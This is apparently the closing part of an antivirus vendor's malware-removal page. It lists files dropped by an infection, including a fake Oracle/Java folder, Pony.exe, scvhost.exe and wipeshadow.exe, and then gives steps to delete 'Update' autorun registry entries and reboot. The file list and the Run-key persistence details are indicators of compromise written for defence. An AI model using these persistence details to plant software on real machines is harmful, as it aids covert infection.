    %Documents and Settings%\%current user%\Application Data\Oracle\lib\classlist (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jaas_nt.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_es.rtf (26 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpeg.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\orbd.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\task64.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unicows.dll (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\nio.dll (20 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\servertool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\net.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\ffjcext.zip (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ktab.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\splashscreen.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\lzma.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_fr.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jsse.jar (3361 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\deploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2native.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\psfontj2d.properties (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\eula.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\COPYRIGHT (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javaw.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java_crw_demo.dll (14 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmiregistry.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npoji610.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\deploy.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\awt.dll (7726 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\Xusage.txt (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\LINEAR_RGB.pf (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_de.rtf (39 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ja.rtf (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\regutils.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_sv.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jli.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\kinit.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\mlib_image.dll (4185 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jsoundds.dll (18 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\Welcome.html (994 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_es.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\resources.jar (7547 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy.jar (22350 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE.rtf (13 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pkcs11.dll (41 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\calendars.properties (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2ssv.dll (41 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.properties.src (9 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\sRGB.pf (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npjp2.dll (65 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\hprof.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_CN.rtf (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_shmem.dll (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ioser12.dll (12 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\sound.properties (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java-rmi.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jce.jar (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\GRAY.pf (632 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\classes.jsa (100416 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\THIRDPARTYLICENSEREADME.txt (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javaws.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\JdbcOdbc.dll (36 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\net.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpicom.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\klist.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jqsnotify.exe (55 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\content-types.properties (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2launcher.exe (23 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\w2k_lsa_auth.dll (24 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2iexp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npdeploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ko.rtf (44 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.bfc (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_it.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_socket.dll (13 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jawt.dll (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\wsdetect.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\zip.dll (47 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\javaws.jar (5873 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\axbridge.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\charsets.jar (49738 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\logging.properties (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\verify.dll (31 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\keytool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.properties.src (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dcpr.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\meta-index (2 bytes)
    %Documents and Settings%\%current user%\Application Data\cry.exe (162 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (571 bytes)
    %Documents and Settings%\%current user%\Application Data\crys.exe (1744 bytes)
    %Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
    %Documents and Settings%\%current user%\Application Data\scvhost.exe (10815 bytes)
    %Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crys.exe (1744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\New Order.jar (240 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\run.dat (8 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\catalog.dat (216 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fffffffffffffff.exe (1645 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\storage.dat (1654 bytes)
    %Documents and Settings%\All Users\Application Data\wipeshadow.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\loader.exe (77 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\settings.bin (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpa3c7d18a.bat (215 bytes)
    %Documents and Settings%\%current user%\Application Data\svchost.exe (113 bytes)
    %Documents and Settings%\%current user%\Application Data\Imxyhi\ibza.exe (226 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp2edc71a6.bat (209 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now